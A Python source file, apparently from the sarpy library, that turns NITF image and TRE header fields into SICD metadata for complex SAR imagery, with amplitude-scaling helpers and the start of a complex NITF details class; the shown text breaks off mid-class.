from sarpy.io.general.base import SarpyIOError
from sarpy.io.general.data_segment import DataSegment, SubsetSegment
from sarpy.io.general.format_function import FormatFunction, ComplexFormatFunction
from sarpy.io.general.nitf import extract_image_corners, NITFDetails, NITFReader
from sarpy.io.general.nitf_elements.security import NITFSecurityTags
from sarpy.io.general.nitf_elements.image import ImageSegmentHeader, ImageSegmentHeader0
from sarpy.io.general.nitf_elements.nitf_head import NITFHeader, NITFHeader0
from sarpy.io.general.nitf_elements.base import TREList
from sarpy.io.general.nitf_elements.tres.unclass.CMETAA import CMETAA
from sarpy.io.general.utils import is_file_like
from sarpy.io.complex.base import SICDTypeReader
from sarpy.io.complex.sicd_elements.SICD import SICDType
from sarpy.io.complex.sicd_elements.CollectionInfo import CollectionInfoType
from sarpy.io.complex.sicd_elements.ImageData import ImageDataType
from sarpy.io.complex.sicd_elements.GeoData import GeoDataType, SCPType
from sarpy.io.complex.sicd_elements.Grid import GridType, DirParamType, WgtTypeType
from sarpy.io.complex.sicd_elements.Timeline import TimelineType, IPPSetType
from sarpy.io.complex.sicd_elements.RadarCollection import RadarCollectionType, \
TxFrequencyType, WaveformParametersType, ChanParametersType
from sarpy.io.complex.sicd_elements.SCPCOA import SCPCOAType
from sarpy.io.complex.sicd_elements.ImageFormation import ImageFormationType, TxFrequencyProcType
from sarpy.io.complex.sicd_elements.ImageCreation import ImageCreationType
from sarpy.io.complex.sicd_elements.PFA import PFAType
logger = logging.getLogger(__name__)
_iso_date_format = '{}-{}-{}T{}:{}:{}'
# NB: DO NOT implement is_a() here.
# This will explicitly happen after other readers
########
# Define sicd structure from image sub-header information
def extract_sicd(
img_header: Union[ImageSegmentHeader, ImageSegmentHeader0],
        transpose: bool,
nitf_header: Optional[Union[NITFHeader, NITFHeader0]] = None) -> SICDType:
"""
Extract the best available SICD structure from relevant nitf header structures.
Parameters
----------
img_header : ImageSegmentHeader|ImageSegmentHeader0
transpose : bool
nitf_header : None|NITFHeader|NITFHeader0
Returns
-------
SICDType
"""
def get_collection_info() -> CollectionInfoType:
isorce = img_header.ISORCE.strip()
collector_name = None if len(isorce) < 1 else isorce
iid2 = img_header.IID2.strip()
core_name = img_header.IID1.strip() if len(iid2) < 1 else iid2
class_str = img_header.Security.CLAS
if class_str == 'T':
classification = 'TOPSECRET'
elif class_str == 'S':
classification = 'SECRET'
elif class_str == 'C':
classification = 'CONFIDENTIAL'
elif class_str == 'U':
classification = 'UNCLASSIFIED'
else:
classification = ''
ctlh = img_header.Security.CTLH.strip()
        if len(ctlh) > 0:
            classification += '//' + ctlh
        code = img_header.Security.CODE.strip()
        if len(code) > 0:
            classification += '//' + code
return CollectionInfoType(
CollectorName=collector_name,
CoreName=core_name,
Classification=classification)
def get_image_data() -> ImageDataType:
pvtype = img_header.PVTYPE
if pvtype == 'C':
if img_header.NBPP != 64:
logger.warning(
'This NITF has complex bands that are not 64-bit.\n\t'
'This is not currently supported.')
pixel_type = 'RE32F_IM32F'
elif pvtype == 'R':
if img_header.NBPP == 64:
logger.warning(
'The real/imaginary data in the NITF are stored as 64-bit floating point.\n\t'
'The closest Pixel Type, RE32F_IM32F, will be used,\n\t'
'but there may be overflow issues if converting this file.')
pixel_type = 'RE32F_IM32F'
elif pvtype == 'SI':
pixel_type = 'RE16I_IM16I'
else:
raise ValueError('Got unhandled PVTYPE {}'.format(pvtype))
if transpose:
rows = img_header.NCOLS
cols = img_header.NROWS
else:
rows = img_header.NROWS
cols = img_header.NCOLS
return ImageDataType(
PixelType=pixel_type,
NumRows=rows,
NumCols=cols,
FirstRow=0,
FirstCol=0,
FullImage=(rows, cols),
SCPPixel=(0.5 * rows, 0.5 * cols))
def append_country_code(cc) -> None:
if len(cc) > 0:
if the_sicd.CollectionInfo is None:
the_sicd.CollectionInfo = CollectionInfoType(CountryCodes=[cc, ])
elif the_sicd.CollectionInfo.CountryCodes is None:
the_sicd.CollectionInfo.CountryCodes = [cc, ]
elif cc not in the_sicd.CollectionInfo.CountryCodes:
the_sicd.CollectionInfo.CountryCodes.append(cc)
def set_image_corners(icps: numpy.ndarray, override: bool = False) -> None:
if the_sicd.GeoData is None:
the_sicd.GeoData = GeoDataType(ImageCorners=icps)
elif the_sicd.GeoData.ImageCorners is None or override:
the_sicd.GeoData.ImageCorners = icps
def set_arp_position(arp_ecf: numpy.ndarray, override: bool = False) -> None:
if the_sicd.SCPCOA is None:
the_sicd.SCPCOA = SCPCOAType(ARPPos=arp_ecf)
elif override:
# prioritize this information first - it should be more reliable than other sources
the_sicd.SCPCOA.ARPPos = arp_ecf
def set_scp(scp_ecf: numpy.ndarray, scp_pixel: Union[numpy.ndarray, list, tuple], override: bool = False) -> None:
def set_scppixel():
if the_sicd.ImageData is None:
the_sicd.ImageData = ImageDataType(SCPPixel=scp_pixel)
else:
the_sicd.ImageData.SCPPixel = scp_pixel
if the_sicd.GeoData is None:
the_sicd.GeoData = GeoDataType(SCP=SCPType(ECF=scp_ecf))
set_scppixel()
elif the_sicd.GeoData.SCP is None or override:
the_sicd.GeoData.SCP = SCPType(ECF=scp_ecf)
set_scppixel()
def set_collect_start(
collect_start: Union[str, datetime, numpy.datetime64], override: bool = False) -> None:
if the_sicd.Timeline is None:
the_sicd.Timeline = TimelineType(CollectStart=collect_start)
elif the_sicd.Timeline.CollectStart is None or override:
the_sicd.Timeline.CollectStart = collect_start
def set_uvects(row_unit: numpy.ndarray, col_unit: numpy.ndarray) -> None:
if the_sicd.Grid is None:
the_sicd.Grid = GridType(
Row=DirParamType(UVectECF=row_unit),
Col=DirParamType(UVectECF=col_unit))
return
if the_sicd.Grid.Row is None:
the_sicd.Grid.Row = DirParamType(UVectECF=row_unit)
elif the_sicd.Grid.Row.UVectECF is None:
the_sicd.Grid.Row.UVectECF = row_unit
if the_sicd.Grid.Col is None:
the_sicd.Grid.Col = DirParamType(UVectECF=col_unit)
elif the_sicd.Grid.Col.UVectECF is None:
the_sicd.Grid.Col.UVectECF = col_unit
def try_CMETAA() -> None:
# noinspection PyTypeChecker
tre = None if tres is None else tres['CMETAA'] # type: CMETAA
if tre is None:
return
cmetaa = tre.DATA
if the_sicd.GeoData is None:
the_sicd.GeoData = GeoDataType()
if the_sicd.SCPCOA is None:
the_sicd.SCPCOA = SCPCOAType()
if the_sicd.Grid is None:
the_sicd.Grid = GridType()
if the_sicd.Timeline is None:
the_sicd.Timeline = TimelineType()
if the_sicd.RadarCollection is None:
the_sicd.RadarCollection = RadarCollectionType()
if the_sicd.ImageFormation is None:
the_sicd.ImageFormation = ImageFormationType()
the_sicd.SCPCOA.SCPTime = 0.5*float(cmetaa.WF_CDP)
the_sicd.GeoData.SCP = SCPType(ECF=tre.get_scp())
the_sicd.SCPCOA.ARPPos = tre.get_arp()
the_sicd.SCPCOA.SideOfTrack = cmetaa.CG_LD.strip().upper()
the_sicd.SCPCOA.SlantRange = float(cmetaa.CG_SRAC)
the_sicd.SCPCOA.DopplerConeAng = float(cmetaa.CG_CAAC)
the_sicd.SCPCOA.GrazeAng = float(cmetaa.CG_GAAC)
the_sicd.SCPCOA.IncidenceAng = 90 - float(cmetaa.CG_GAAC)
if hasattr(cmetaa, 'CG_TILT'):
the_sicd.SCPCOA.TwistAng = float(cmetaa.CG_TILT)
if hasattr(cmetaa, 'CG_SLOPE'):
the_sicd.SCPCOA.SlopeAng = float(cmetaa.CG_SLOPE)
the_sicd.ImageData.SCPPixel = [int(cmetaa.IF_DC_IS_COL), int(cmetaa.IF_DC_IS_ROW)]
img_corners = tre.get_image_corners()
if img_corners is not None:
the_sicd.GeoData.ImageCorners = img_corners
if cmetaa.CMPLX_SIGNAL_PLANE.upper() == 'S':
the_sicd.Grid.ImagePlane = 'SLANT'
elif cmetaa.CMPLX_SIGNAL_PLANE.upper() == 'G':
the_sicd.Grid.ImagePlane = 'GROUND'
else:
logger.warning(
'Got unexpected CMPLX_SIGNAL_PLANE value {},\n\t'
'setting ImagePlane to SLANT'.format(cmetaa.CMPLX_SIGNAL_PLANE))
the_sicd.Grid.Row = DirParamType(
SS=float(cmetaa.IF_RSS),
ImpRespWid=float(cmetaa.IF_RGRES),
Sgn=1 if cmetaa.IF_RFFTS.strip() == '-' else -1, # opposite sign convention
ImpRespBW=float(cmetaa.IF_RFFT_SAMP)/(float(cmetaa.IF_RSS)*float(cmetaa.IF_RFFT_TOT)))
the_sicd.Grid.Col = DirParamType(
SS=float(cmetaa.IF_AZSS),
ImpRespWid=float(cmetaa.IF_AZRES),
Sgn=1 if cmetaa.IF_AFFTS.strip() == '-' else -1, # opposite sign convention
ImpRespBW=float(cmetaa.IF_AZFFT_SAMP)/(float(cmetaa.IF_AZSS)*float(cmetaa.IF_AZFFT_TOT)))
cmplx_weight = cmetaa.CMPLX_WEIGHT.strip().upper()
if cmplx_weight == 'UWT':
the_sicd.Grid.Row.WgtType = WgtTypeType(WindowName='UNIFORM')
the_sicd.Grid.Col.WgtType = WgtTypeType(WindowName='UNIFORM')
elif cmplx_weight == 'HMW':
the_sicd.Grid.Row.WgtType = WgtTypeType(WindowName='HAMMING')
the_sicd.Grid.Col.WgtType = WgtTypeType(WindowName='HAMMING')
elif cmplx_weight == 'HNW':
the_sicd.Grid.Row.WgtType = WgtTypeType(WindowName='HANNING')
the_sicd.Grid.Col.WgtType = WgtTypeType(WindowName='HANNING')
elif cmplx_weight == 'TAY':
the_sicd.Grid.Row.WgtType = WgtTypeType(
WindowName='TAYLOR',
Parameters={
'SLL': '-{0:d}'.format(int(cmetaa.CMPLX_RNG_SLL)),
'NBAR': '{0:d}'.format(int(cmetaa.CMPLX_RNG_TAY_NBAR))})
the_sicd.Grid.Col.WgtType = WgtTypeType(
WindowName='TAYLOR',
Parameters={
'SLL': '-{0:d}'.format(int(cmetaa.CMPLX_AZ_SLL)),
'NBAR': '{0:d}'.format(int(cmetaa.CMPLX_AZ_TAY_NBAR))})
else:
logger.warning(
'Got unsupported CMPLX_WEIGHT value {}.\n\tThe resulting SICD will '
'not have valid weight array populated'.format(cmplx_weight))
the_sicd.Grid.Row.define_weight_function()
the_sicd.Grid.Col.define_weight_function()
# noinspection PyBroadException
try:
date_str = cmetaa.T_UTC_YYYYMMMDD
time_str = cmetaa.T_HHMMSSUTC
date_time = _iso_date_format.format(
date_str[:4], date_str[4:6], date_str[6:8],
time_str[:2], time_str[2:4], time_str[4:6])
the_sicd.Timeline.CollectStart = numpy.datetime64(date_time, 'us')
except Exception:
logger.info('Failed extracting start time from CMETAA')
pass
the_sicd.Timeline.CollectDuration = float(cmetaa.WF_CDP)
the_sicd.Timeline.IPP = [
IPPSetType(TStart=0,
TEnd=float(cmetaa.WF_CDP),
IPPStart=0,
IPPEnd=numpy.floor(float(cmetaa.WF_CDP)*float(cmetaa.WF_PRF)),
IPPPoly=[0, float(cmetaa.WF_PRF)])]
the_sicd.RadarCollection.TxFrequency = TxFrequencyType(
Min=float(cmetaa.WF_SRTFR),
Max=float(cmetaa.WF_ENDFR))
the_sicd.RadarCollection.TxPolarization = cmetaa.POL_TR.upper()
the_sicd.RadarCollection.Waveform = [WaveformParametersType(
TxPulseLength=float(cmetaa.WF_WIDTH),
TxRFBandwidth=float(cmetaa.WF_BW),
TxFreqStart=float(cmetaa.WF_SRTFR),
TxFMRate=float(cmetaa.WF_CHRPRT)*1e12)]
tx_rcv_pol = '{}:{}'.format(cmetaa.POL_TR.upper(), cmetaa.POL_RE.upper())
the_sicd.RadarCollection.RcvChannels = [
ChanParametersType(TxRcvPolarization=tx_rcv_pol)]
the_sicd.ImageFormation.TxRcvPolarizationProc = tx_rcv_pol
if_process = cmetaa.IF_PROCESS.strip().upper()
if if_process == 'PF':
the_sicd.ImageFormation.ImageFormAlgo = 'PFA'
scp_ecf = tre.get_scp()
fpn_ned = numpy.array(
[float(cmetaa.CG_FPNUV_X), float(cmetaa.CG_FPNUV_Y), float(cmetaa.CG_FPNUV_Z)], dtype='float64')
ipn_ned = numpy.array(
[float(cmetaa.CG_IDPNUVX), float(cmetaa.CG_IDPNUVY), float(cmetaa.CG_IDPNUVZ)], dtype='float64')
fpn_ecf = ned_to_ecf(fpn_ned, scp_ecf, absolute_coords=False)
ipn_ecf = ned_to_ecf(ipn_ned, scp_ecf, absolute_coords=False)
the_sicd.PFA = PFAType(FPN=fpn_ecf, IPN=ipn_ecf)
elif if_process in ['RM', 'CD']:
the_sicd.ImageFormation.ImageFormAlgo = 'RMA'
# the remainder of this is guesswork to define required fields
the_sicd.ImageFormation.TStartProc = 0 # guess work
the_sicd.ImageFormation.TEndProc = float(cmetaa.WF_CDP)
the_sicd.ImageFormation.TxFrequencyProc = TxFrequencyProcType(
MinProc=float(cmetaa.WF_SRTFR), MaxProc=float(cmetaa.WF_ENDFR))
# all remaining guess work
the_sicd.ImageFormation.STBeamComp = 'NO'
the_sicd.ImageFormation.ImageBeamComp = 'SV' if cmetaa.IF_BEAM_COMP[0] == 'Y' else 'NO'
the_sicd.ImageFormation.AzAutofocus = 'NO' if cmetaa.AF_TYPE[0] == 'N' else 'SV'
the_sicd.ImageFormation.RgAutofocus = 'NO'
def try_AIMIDA() -> None:
tre = None if tres is None else tres['AIMIDA']
if tre is None:
return
aimida = tre.DATA
append_country_code(aimida.COUNTRY.strip())
create_time = datetime.strptime(aimida.CREATION_DATE, '%d%b%y')
if the_sicd.ImageCreation is None:
the_sicd.ImageCreation = ImageCreationType(DateTime=create_time)
elif the_sicd.ImageCreation.DateTime is None:
the_sicd.ImageCreation.DateTime = create_time
collect_start = datetime.strptime(aimida.MISSION_DATE+aimida.TIME, '%d%b%y%H%M')
set_collect_start(collect_start, override=False)
def try_AIMIDB() -> None:
tre = None if tres is None else tres['AIMIDB']
if tre is None:
return
aimidb = tre.DATA
append_country_code(aimidb.COUNTRY.strip())
if the_sicd.ImageFormation is not None and the_sicd.ImageFormation.SegmentIdentifier is None:
the_sicd.ImageFormation.SegmentIdentifier = aimidb.CURRENT_SEGMENT.strip()
date_str = aimidb.ACQUISITION_DATE
collect_start = numpy.datetime64(_iso_date_format.format(
date_str[:4], date_str[4:6], date_str[6:8],
date_str[8:10], date_str[10:12], date_str[12:14]), 'us')
set_collect_start(collect_start, override=False)
def try_ACFT() -> None:
if tres is None:
return
tre = tres['ACFTA']
if tre is None:
tre = tres['ACFTB']
if tre is None:
return
acft = tre.DATA
sensor_id = acft.SENSOR_ID.strip()
if len(sensor_id) > 1:
if the_sicd.CollectionInfo is None:
the_sicd.CollectionInfo = CollectionInfoType(CollectorName=sensor_id)
elif the_sicd.CollectionInfo.CollectorName is None:
the_sicd.CollectionInfo.CollectorName = sensor_id
row_ss = float(acft.ROW_SPACING)
col_ss = float(acft.COL_SPACING)
if hasattr(acft, 'ROW_SPACING_UNITS') and acft.ROW_SPACING_UNITS.strip().lower() == 'f':
row_ss *= foot
if hasattr(acft, 'COL_SPACING_UNITS') and acft.COL_SPACING_UNITS.strip().lower() == 'f':
col_ss *= foot
# NB: these values are actually ground plane values, and should be
# corrected to slant plane if possible
if the_sicd.SCPCOA is not None:
if the_sicd.SCPCOA.GrazeAng is not None:
col_ss *= numpy.cos(numpy.deg2rad(the_sicd.SCPCOA.GrazeAng))
if the_sicd.SCPCOA.TwistAng is not None:
row_ss *= numpy.cos(numpy.deg2rad(the_sicd.SCPCOA.TwistAng))
if the_sicd.Grid is None:
the_sicd.Grid = GridType(Row=DirParamType(SS=row_ss), Col=DirParamType(SS=col_ss))
return
if the_sicd.Grid.Row is None:
the_sicd.Grid.Row = DirParamType(SS=row_ss)
elif the_sicd.Grid.Row.SS is None:
the_sicd.Grid.Row.SS = row_ss
if the_sicd.Grid.Col is None:
the_sicd.Grid.Col = DirParamType(SS=col_ss)
elif the_sicd.Grid.Col.SS is None:
the_sicd.Grid.Col.SS = col_ss
def try_BLOCKA() -> None:
tre = None if tres is None else tres['BLOCKA']
if tre is None:
return
blocka = tre.DATA
icps = []
for fld_name in ['FRFC_LOC', 'FRLC_LOC', 'LRLC_LOC', 'LRFC_LOC']:
value = getattr(blocka, fld_name)
# noinspection PyBroadException
try:
lat_val = float(value[:10])
lon_val = float(value[10:21])
except ValueError:
lat_val = lat_lon_parser(value[:10])
lon_val = lat_lon_parser(value[10:21])
icps.append([lat_val, lon_val])
set_image_corners(icps, override=False)
def try_MPDSRA() -> None:
def valid_array(arr):
return numpy.all(numpy.isfinite(arr)) and numpy.any(arr != 0)
tre = None if tres is None else tres['MPDSRA']
if tre is None:
return
mpdsra = tre.DATA
scp_ecf = foot*numpy.array(
[float(mpdsra.ORO_X), float(mpdsra.ORO_Y), float(mpdsra.ORO_Z)], dtype='float64')
if valid_array(scp_ecf):
set_scp(scp_ecf, (int(mpdsra.ORP_COLUMN) - 1, int(mpdsra.ORP_ROW) - 1), override=False)
arp_pos_ned = foot*numpy.array(
[float(mpdsra.ARP_POS_N), float(mpdsra.ARP_POS_E), float(mpdsra.ARP_POS_D)], dtype='float64')
arp_vel_ned = foot*numpy.array(
[float(mpdsra.ARP_VEL_N), float(mpdsra.ARP_VEL_E), float(mpdsra.ARP_VEL_D)], dtype='float64')
arp_acc_ned = foot*numpy.array(
[float(mpdsra.ARP_ACC_N), float(mpdsra.ARP_ACC_E), float(mpdsra.ARP_ACC_D)], dtype='float64')
arp_pos = ned_to_ecf(arp_pos_ned, scp_ecf, absolute_coords=True) if valid_array(arp_pos_ned) else None
set_arp_position(arp_pos, override=False)
arp_vel = ned_to_ecf(arp_vel_ned, scp_ecf, absolute_coords=False) if valid_array(arp_vel_ned) else None
if the_sicd.SCPCOA.ARPVel is None:
the_sicd.SCPCOA.ARPVel = arp_vel
arp_acc = ned_to_ecf(arp_acc_ned, scp_ecf, absolute_coords=False) if valid_array(arp_acc_ned) else None
if the_sicd.SCPCOA.ARPAcc is None:
the_sicd.SCPCOA.ARPAcc = arp_acc
if the_sicd.PFA is not None and the_sicd.PFA.FPN is None:
# TODO: is this already in meters?
fpn_ecf = numpy.array(
[float(mpdsra.FOC_X), float(mpdsra.FOC_Y), float(mpdsra.FOC_Z)], dtype='float64') # *foot
if valid_array(fpn_ecf):
the_sicd.PFA.FPN = fpn_ecf
def try_MENSRB() -> None:
tre = None if tres is None else tres['MENSRB']
if tre is None:
return
mensrb = tre.DATA
arp_llh = numpy.array(
[lat_lon_parser(mensrb.ACFT_LOC[:12]),
lat_lon_parser(mensrb.ACFT_LOC[12:25]),
foot*float(mensrb.ACFT_ALT)], dtype='float64')
scp_llh = numpy.array(
[lat_lon_parser(mensrb.RP_LOC[:12]),
lat_lon_parser(mensrb.RP_LOC[12:25]),
foot*float(mensrb.RP_ELV)], dtype='float64')
# TODO: handle the conversion from msl to hae
arp_ecf = geodetic_to_ecf(arp_llh)
scp_ecf = geodetic_to_ecf(scp_llh)
set_arp_position(arp_ecf, override=True)
set_scp(scp_ecf, (int(mensrb.RP_COL)-1, int(mensrb.RP_ROW)-1), override=False)
row_unit_ned = numpy.array(
[float(mensrb.C_R_NC), float(mensrb.C_R_EC), float(mensrb.C_R_DC)], dtype='float64')
col_unit_ned = numpy.array(
[float(mensrb.C_AZ_NC), float(mensrb.C_AZ_EC), float(mensrb.C_AZ_DC)], dtype='float64')
set_uvects(ned_to_ecf(row_unit_ned, scp_ecf, absolute_coords=False),
ned_to_ecf(col_unit_ned, scp_ecf, absolute_coords=False))
def try_MENSRA() -> None:
tre = None if tres is None else tres['MENSRA']
if tre is None:
return
mensra = tre.DATA
arp_llh = numpy.array(
[lat_lon_parser(mensra.ACFT_LOC[:10]),
lat_lon_parser(mensra.ACFT_LOC[10:21]),
foot*float(mensra.ACFT_ALT)], dtype='float64')
scp_llh = numpy.array(
[lat_lon_parser(mensra.CP_LOC[:10]),
lat_lon_parser(mensra.CP_LOC[10:21]),
foot*float(mensra.CP_ALT)], dtype='float64')
# TODO: handle the conversion from msl to hae
arp_ecf = geodetic_to_ecf(arp_llh)
scp_ecf = geodetic_to_ecf(scp_llh)
set_arp_position(arp_ecf, override=True)
# TODO: is this already zero based?
set_scp(geodetic_to_ecf(scp_llh), (int(mensra.CCRP_COL), int(mensra.CCRP_ROW)), override=False)
row_unit_ned = numpy.array(
[float(mensra.C_R_NC), float(mensra.C_R_EC), float(mensra.C_R_DC)], dtype='float64')
col_unit_ned = numpy.array(
[float(mensra.C_AZ_NC), float(mensra.C_AZ_EC), float(mensra.C_AZ_DC)], dtype='float64')
set_uvects(ned_to_ecf(row_unit_ned, scp_ecf, absolute_coords=False),
ned_to_ecf(col_unit_ned, scp_ecf, absolute_coords=False))
def extract_corners() -> None:
icps = extract_image_corners(img_header)
if icps is None:
return
# TODO: include symmetry transform issue
set_image_corners(icps, override=False)
def extract_start() -> None:
# noinspection PyBroadException
try:
date_str = img_header.IDATIM
collect_start = numpy.datetime64(
_iso_date_format.format(
date_str[:4], date_str[4:6], date_str[6:8],
date_str[8:10], date_str[10:12], date_str[12:14]), 'us')
except Exception:
logger.info('failed extracting start time from IDATIM tre')
return
set_collect_start(collect_start, override=False)
# noinspection PyUnresolvedReferences
tres = None if img_header.ExtendedHeader.data is None \
else img_header.ExtendedHeader.data # type: Union[None, TREList]
collection_info = get_collection_info()
image_data = get_image_data()
the_sicd = SICDType(
CollectionInfo=collection_info,
ImageData=image_data)
# apply the various tres and associated logic
# NB: this should generally be in order of preference
try_CMETAA()
try_AIMIDB()
try_AIMIDA()
try_ACFT()
try_BLOCKA()
try_MPDSRA()
try_MENSRA()
try_MENSRB()
extract_corners()
extract_start()
return the_sicd
# Helper methods for transforming data
def get_linear_magnitude_scaling(scale_factor: float):
"""
Get a linear magnitude scaling function, to correct magnitude.
Parameters
----------
scale_factor : float
The scale factor, according to the definition given in STDI-0002.
Returns
-------
callable
"""
def scaler(data):
return data/scale_factor
return scaler
def get_linear_power_scaling(scale_factor):
"""
Get a linear power scaling function, to derive correct magnitude.
Parameters
----------
scale_factor : float
The scale factor, according to the definition given in STDI-0002.
Returns
-------
callable
"""
def scaler(data):
return numpy.sqrt(data/scale_factor)
return scaler
def get_log_magnitude_scaling(scale_factor, db_per_step):
"""
Gets the log magnitude scaling function, to derive correct magnitude.
Parameters
----------
scale_factor : float
The scale factor, according to the definition given in STDI-0002.
db_per_step : float
        The db_per_step factor, according to the definition given in STDI-0002.
Returns
-------
callable
"""
lin_scaler = get_linear_magnitude_scaling(scale_factor)
def scaler(data):
return lin_scaler(numpy.exp(0.05*numpy.log(10)*db_per_step*data))
return scaler
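# Added note: the scaler above maps a stored value x to a linear magnitude of
# 10**(0.05 * db_per_step * x) / scale_factor, i.e. each unit step in the
# stored data raises the magnitude by db_per_step / 20 decades.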
def get_log_power_scaling(scale_factor, db_per_step):
"""
Gets the log power scaling function, to derive correct magnitude.
Parameters
----------
scale_factor : float
The scale factor, according to the definition given in STDI-0002.
db_per_step : float
        The db_per_step factor, according to the definition given in STDI-0002.
Returns
-------
callable
"""
power_scaler = get_linear_power_scaling(scale_factor)
def scaler(data):
return power_scaler(numpy.exp(0.1*numpy.log(10)*db_per_step*data))
return scaler
def get_linlog_magnitude_scaling(scale_factor, tipping_point):
"""
Gets the magnitude scaling function for the model which
is initially linear, and then switches to logarithmic beyond a fixed
tipping point.
Parameters
----------
scale_factor : float
The scale factor, according to the definition given in STDI-0002.
tipping_point : float
The tipping point between the two models.
Returns
-------
callable
"""
db_per_step = 20*numpy.log10(tipping_point)/tipping_point
log_scaler = get_log_magnitude_scaling(scale_factor, db_per_step)
def scaler(data):
out = data/scale_factor
above_tipping = (out > tipping_point)
out[above_tipping] = log_scaler(data[above_tipping])
return out
return scaler
class ApplyAmplitudeScalingFunction(ComplexFormatFunction):
__slots__ = ('_scaling_function', )
_allowed_ordering = ('MP', 'PM')
has_inverse = False
def __init__(
self,
raw_dtype: Union[str, numpy.dtype],
order: str,
scaling_function: Optional[Callable] = None,
raw_shape: Optional[Tuple[int, ...]] = None,
formatted_shape: Optional[Tuple[int, ...]] = None,
reverse_axes: Optional[Tuple[int, ...]] = None,
transpose_axes: Optional[Tuple[int, ...]] = None,
band_dimension: int = -1):
"""
Parameters
----------
raw_dtype : str|numpy.dtype
The raw datatype. Valid options dependent on the value of order.
order : str
One of `('MP', 'PM')`, with allowable raw_dtype
`('uint8', 'uint16', 'uint32', 'float32', 'float64')`.
scaling_function : Optional[Callable]
raw_shape : None|Tuple[int, ...]
formatted_shape : None|Tuple[int, ...]
reverse_axes : None|Tuple[int, ...]
transpose_axes : None|Tuple[int, ...]
band_dimension : int
Which band is the complex dimension, **after** the transpose operation.
"""
self._scaling_function = None
ComplexFormatFunction.__init__(
self, raw_dtype, order, raw_shape=raw_shape, formatted_shape=formatted_shape,
reverse_axes=reverse_axes, transpose_axes=transpose_axes, band_dimension=band_dimension)
self._set_scaling_function(scaling_function)
@property
def scaling_function(self) -> Optional[Callable]:
"""
The magnitude scaling function.
Returns
-------
None|Callable
"""
return self._scaling_function
def _set_scaling_function(self, value: Optional[Callable]):
if value is None:
self._scaling_function = None
return
if not isinstance(value, Callable):
raise TypeError('scaling_function must be callable')
self._scaling_function = value
def _forward_magnitude_theta(
self,
data: numpy.ndarray,
out: numpy.ndarray,
magnitude: numpy.ndarray,
theta: numpy.ndarray,
subscript: Tuple[slice, ...]) -> None:
if self._scaling_function is not None:
magnitude = self._scaling_function(magnitude)
ComplexFormatFunction._forward_magnitude_theta(
self, data, out, magnitude, theta, subscript)
def _extract_transform_data(
image_header: Union[ImageSegmentHeader, ImageSegmentHeader0],
band_dimension: int):
"""
    Helper function for defining the transform_data handling needed for
    interpreting image segment data.
Parameters
----------
image_header : ImageSegmentHeader|ImageSegmentHeader0
Returns
-------
None|str|callable
"""
if len(image_header.Bands) != 2:
raise ValueError('Got unhandled case of {} image bands'.format(len(image_header.Bands)))
complex_order = image_header.Bands[0].ISUBCAT+image_header.Bands[1].ISUBCAT
if complex_order not in ['IQ', 'QI', 'MP', 'PM']:
raise ValueError('Got unhandled complex order `{}`'.format(complex_order))
bpp = int(image_header.NBPP/8)
pv_type = image_header.PVTYPE
if pv_type == 'INT':
raw_dtype = '>u{}'.format(bpp)
elif pv_type == 'SI':
raw_dtype = '>i{}'.format(bpp)
elif pv_type == 'R':
raw_dtype = '>f{}'.format(bpp)
else:
raise ValueError('Got unhandled PVTYPE {}'.format(pv_type))
# noinspection PyUnresolvedReferences
    tre = None if image_header.ExtendedHeader.data is None else \
        image_header.ExtendedHeader.data['CMETAA']  # type: Optional[CMETAA]
if tre is None:
return ComplexFormatFunction(raw_dtype, complex_order, band_dimension=band_dimension)
cmetaa = tre.DATA
if cmetaa.CMPLX_PHASE_SCALING_TYPE.strip() != 'NS':
raise ValueError(
'Got unsupported CMPLX_PHASE_SCALING_TYPE {}'.format(
cmetaa.CMPLX_PHASE_SCALING_TYPE))
remap_type = cmetaa.CMPLX_MAG_REMAP_TYPE.strip()
if remap_type == 'NS':
if complex_order in ['IQ', 'QI']:
return ComplexFormatFunction(raw_dtype, complex_order, band_dimension=band_dimension)
else:
raise ValueError(
'Got unexpected state where cmetaa.CMPLX_MAG_REMAP_TYPE is "NS",\n\t '
'but Band[0].ISUBCAT/Band[1].ISUBCAT = `{}`'.format(complex_order))
elif remap_type not in ['LINM', 'LINP', 'LOGM', 'LOGP', 'LLM']:
raise ValueError('Got unsupported CMETAA.CMPLX_MAG_REMAP_TYPE {}'.format(remap_type))
if complex_order not in ['MP', 'PM']:
raise ValueError(
'Got unexpected state where cmetaa.CMPLX_MAG_REMAP_TYPE is `{}`,\n\t'
'but Band[0].ISUBCAT/Band[1].ISUBCAT = `{}`'.format(
remap_type, complex_order))
scale_factor = float(cmetaa.CMPLX_LIN_SCALE)
if remap_type == 'LINM':
scaling_function = get_linear_magnitude_scaling(scale_factor)
elif remap_type == 'LINP':
scaling_function = get_linear_power_scaling(scale_factor)
elif remap_type == 'LOGM':
# NB: there is nowhere in the CMETAA structure to define
# the db_per_step value. Strangely, the use of this value is laid
# out in the STDI-0002 standards document, which defines CMETAA
# structure. We will generically use a value which maps the
# max uint8 value to the max int16 value.
db_per_step = 300*numpy.log(2)/255.0
scaling_function = get_log_magnitude_scaling(scale_factor, db_per_step)
elif remap_type == 'LOGP':
db_per_step = 300*numpy.log(2)/255.0
scaling_function = get_log_power_scaling(scale_factor, db_per_step)
elif remap_type == 'LLM':
scaling_function = get_linlog_magnitude_scaling(
scale_factor, int(cmetaa.CMPLX_LINLOG_TP))
else:
raise ValueError('Got unhandled CMETAA.CMPLX_MAG_REMAP_TYPE {}'.format(remap_type))
return ApplyAmplitudeScalingFunction(raw_dtype, complex_order, scaling_function, band_dimension=band_dimension)
######
# The interpreter and reader objects
class ComplexNITFDetails(NITFDetails):
"""
Details object for NITF file containing complex data.
"""
__slots__ = (
'_segment_status', '_segment_bands', '_sicd_meta', '_reverse_axes', '_transpose_axes')
def __init__(
self,
file_name: str,
reverse_axes: Union[None, int, Sequence[int]] = None,
transpose_axes: Optional[Tuple[int, ...]] = None):
"""
Parameters
----------
file_name : str
file name for a NITF file containing a complex SICD
reverse_axes : None|Sequence[int]
Any entries should be restricted to `{0, 1}`. The presence of
`0` means to reverse the rows (in the raw sense), and the presence
of `1` means to reverse the columns (in the raw sense).
transpose_axes : None|Tuple[int, ...]
If presented this should be only `(1, 0)`.
"""
self._reverse_axes = reverse_axes
self._transpose_axes = transpose_axes
self._segment_status = None
self._sicd_meta = None
self._segment_bands = None
NITFDetails.__init__(self, file_name)
self._find_complex_image_segments()
if len(self.sicd_meta) == 0:
raise SarpyIOError(
'No complex valued image segments found in file {}'.format(file_name))
@property
def reverse_axes(self) -> Union[None, int, Sequence[int]]:
return self._reverse_axes
@property
def transpose_axes(self) -> Optional[Tuple[int, ...]]:
return self._transpose_axes
@property
